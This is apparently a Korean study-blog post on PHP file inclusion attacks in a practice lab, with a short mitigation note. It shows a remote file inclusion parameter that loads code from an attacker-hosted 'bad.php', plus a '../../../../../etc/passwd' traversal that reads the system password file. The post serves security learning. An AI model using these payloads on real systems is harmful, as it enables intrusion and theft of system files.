Chapter 11. 파일 인클루전 공격

==================================================

!warning!

본 게시글은 본인의 학습기록을 위해 작성된 알려진 학습 기법

함부로 악의적으로 이용은 엄연히 불법 임으로

절대 시도하지 말 것이며

사고 발생 시 본인은 절대로 책임지지 않습니다!

==================================================

 

Chapter 11. 파일 인클루전 공격
파일 인클루전 공격 개요-주로 PHP 애플리케이션을

대상으로 발생 됩니다. PHP 인클루드 기능
(include() 함수를 사용하여 다른 파일을 소스 코드에 직접 인클루드시킬 수 있는 기능)

-호스트 내부의 파일이냐 외부 파일이냐에 따라
리모트 파일 인클루전 or 리모트 파일 인크루전으로 구분

-../../../../../etc/passwd와 같이 여러 번 입력하여 루트 디렉토리까지 이동 가능
→ 디렉토리 트래버셜 공격

파일 인클루전 공격 실습

 

스샷. 1-3

– bad.php 샘플파일을 /var/www/html로 복사 시킨다음

– 아파치 서버를 실행 시킵니다.

스샷. 4

– low 단계에서 file1.php를 클릭하면 url에서 page=include.php 부분을 확인할 수 있습니다.

-파일의 경로가 파라미터를 통해 전달되면 파일 인클루전 공격이나

디렉터리 트래버셜 공격을 시도해 볼 수 있습니다.

1

page=http://<칼리리눅스 ip>/bad.php

cs

 

스샷. 4

-bad.php 파일이 인클루드 되어 실행됩니다.
-덤으로 /etc/passwd의 내용도 같이 출력이 됩니다

스샷. 5

-../../../../../를 입력한 이유는 파일 인클루전 복습 페이지의 호스트 내 경로이기 때문에
같이 진행을 해보니 역시 passwd 파일 내용이 출력이 됩니다.

파일 인클루전 공격 대응-외부 사용자가 입력한

파일 이름을 인클루드에 사용하지 않는 것인데
쓸 경우에는 입력 값을 검증해야 합니다.

==========================================
이번 게시글은 비교적 간단하군요(?)

흠… 생각보다 조금 빨리 올리는듯(?) 합니다.. ōxō;;

~~흠… 생각보다 조금 빨리 올리는듯(?) 합니다.. ōxō;;~~

아무튼 읽어주셔서 감사하고

남은 시간 좋은 하루 보내시고,

하시는 일 잘 되시길 바랍니다.